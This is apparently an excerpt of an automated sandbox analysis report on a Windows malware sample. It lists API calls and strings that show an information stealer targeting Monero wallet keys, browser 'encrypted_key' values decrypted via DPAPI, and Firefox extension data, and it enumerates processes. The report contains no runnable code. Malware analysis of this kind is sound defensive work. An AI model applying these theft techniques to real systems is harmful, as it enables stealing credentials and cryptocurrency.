                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C98EF2
                                    • wsprintfW.USER32 ref: 00C98F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 7f8079757920f42691c939fb2e39a7386e9cf88d8b99c2ba1dc8b807ff6e96fe
                                    • Instruction ID: 002aa4dfb5b5c2fe8a39f73f33b21c12e7aaf547ac5093a1c07aa72a1fb3f77b
                                    • Opcode Fuzzy Hash: 7f8079757920f42691c939fb2e39a7386e9cf88d8b99c2ba1dc8b807ff6e96fe
                                    • Instruction Fuzzy Hash: 91E0EC75A4830DBBDB10EB94ED0AE6D77BCEB05702F100194FE0A97380DA719E10AB95
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00C8AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 00C8ADEC
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 340e67b39c36063f24fba19223921bd4cfc248dd934c1d4bc7cd9fc54adda3dc
                                    • Instruction ID: cd3b30ba571eedb09b2129e251222e00f1e522b3856cbbfe500dc664243ef2de
                                    • Opcode Fuzzy Hash: 340e67b39c36063f24fba19223921bd4cfc248dd934c1d4bc7cd9fc54adda3dc
                                    • Instruction Fuzzy Hash: D2E1DF729101189BCF04FBA4DDAAEEE733DAF14301F508599F516760A1EF306B48DBA6
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D581
                                    • lstrlen.KERNEL32(00000000), ref: 00C8D798
                                    • lstrlen.KERNEL32(00000000), ref: 00C8D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: aecb8d56f886d5257a71c8a0350cd30a7533c7b21daadaeeffe565f049aea879
                                    • Instruction ID: 22749bbbbae486333f7a3352f5639a179fc405f9f7738a612aa56ce455bf992b
                                    • Opcode Fuzzy Hash: aecb8d56f886d5257a71c8a0350cd30a7533c7b21daadaeeffe565f049aea879
                                    • Instruction Fuzzy Hash: BB91EF729101089BCF04FBA4DDAAEEE7339AF54305F504569F51766091EF306B08EBE6
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C8D901
                                    • lstrlen.KERNEL32(00000000), ref: 00C8DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 00C8DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C8DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 91d3c1b8746c7107ca46a8ce804782499403a1c7458b64e8d2f8fa7dcafd0ae0
                                    • Instruction ID: 45787511f4f903f1a74402a1450e8a149189ff3295aa1774342150d6b25e9521
                                    • Opcode Fuzzy Hash: 91d3c1b8746c7107ca46a8ce804782499403a1c7458b64e8d2f8fa7dcafd0ae0
                                    • Instruction Fuzzy Hash: FE81EE729102089BCF04FBA4DCAAEEE7379AF54305F504568F51766091EF306B08EBE6
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: c6ad5a36e38f578d90953e21c635b940af0540d73b3ce44daead2ead3fc7ac56
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 0951C27260020AAFEB798F95C841BBA77A4FF01310F24413DEA59975D1E731ED81DBA2
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C8A664
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 2e459ef61943c662edccc3fa8ac96bd6e7d3eafcb5c5905c588f40e3affbc4df
                                    • Instruction ID: 429525be7e71dc86d8e5dcc5fd54f0cd3adb3313070db6412caa48dbeee07efa
                                    • Opcode Fuzzy Hash: 2e459ef61943c662edccc3fa8ac96bd6e7d3eafcb5c5905c588f40e3affbc4df
                                    • Instruction Fuzzy Hash: 52515F70A00208EFDF14EFA4CD96FED77B5AF41348F008118F90A5B691EB70AA45EB95
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CA1678,00CA0D93), ref: 00C8F64C
                                    • lstrlen.KERNEL32(00000000), ref: 00C8F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 2ec513ea9f651af2a1a79084ea7621bb15edf02a82ad73a16c19b3dd9bfa0047
                                    • Instruction ID: cc70797e3a90fb93f1d29052e48a87bdf2a31c9c8e07e0efe55504f7b43a0a1e
                                    • Opcode Fuzzy Hash: 2ec513ea9f651af2a1a79084ea7621bb15edf02a82ad73a16c19b3dd9bfa0047
                                    • Instruction Fuzzy Hash: 2E511C72D00108ABCF04FBA4DDAADED7379AF54304F408568F81667191EE346B08EBA6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 0e25c9f8d482e6c5d905c54d692e5e59ea3182b12333b803e3028449cb1417d5
                                    • Instruction ID: 227c42f430efd8fabf420b91820e370ea634c094f7877f8286b1899631e06129
                                    • Opcode Fuzzy Hash: 0e25c9f8d482e6c5d905c54d692e5e59ea3182b12333b803e3028449cb1417d5
                                    • Instruction Fuzzy Hash: C741F871D0420A9BCF04EFE5D859AEEB778AF44304F108029F51676290EB74AB45DFA5
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C8A489
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                      • Part of subcall function 00C8A210: LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                      • Part of subcall function 00C8A210: LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                      • Part of subcall function 00C8A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8A2D4
                                      • Part of subcall function 00C8A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C8A2F3
                                      • Part of subcall function 00C8A2B0: LocalFree.KERNEL32(?), ref: 00C8A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 236f6ee36005130eb622e046f10bb453878a5fed9cfe7e0c83e532c96ca55c57
                                    • Instruction ID: fc7e0ddb7dd9fbfa870c4eb49d88c44deb4b9832df8affdfaa6d1c47f54939d8
                                    • Opcode Fuzzy Hash: 236f6ee36005130eb622e046f10bb453878a5fed9cfe7e0c83e532c96ca55c57
                                    • Instruction Fuzzy Hash: 013161B6D0020DABDF04EFE4DC45AEFB3B8BF59308F044519E915A3241EB349A45CBA6
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CA05BF), ref: 00C9885A
                                    • Process32First.KERNEL32(?,00000128), ref: 00C9886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00C98883
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • CloseHandle.KERNEL32(?), ref: 00C988F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 402fb318df5d50a4463de45d7a685321abd32688e0f4a0376cea8b226604f959
                                    • Instruction ID: 00dec317e90729ccb4ff1473ca043fe4332eacbd48961ff7e508d2b331359c57
                                    • Opcode Fuzzy Hash: 402fb318df5d50a4463de45d7a685321abd32688e0f4a0376cea8b226604f959
                                    • Instruction Fuzzy Hash: 48314871901218ABCF24EF95DD59FEEB778EB45700F1045A9F10AA61A0DB306B48DFA1
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CFFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CFFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: 6b2cd6d0d470a14ecbbf802e646ed0390a67bf55acf9bbd76c88f9bb91551ecd
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: 7C01B136109729AEF67526755CC9A763A94EF017B5734433DF22A801F2EF924C429161
                                    APIs
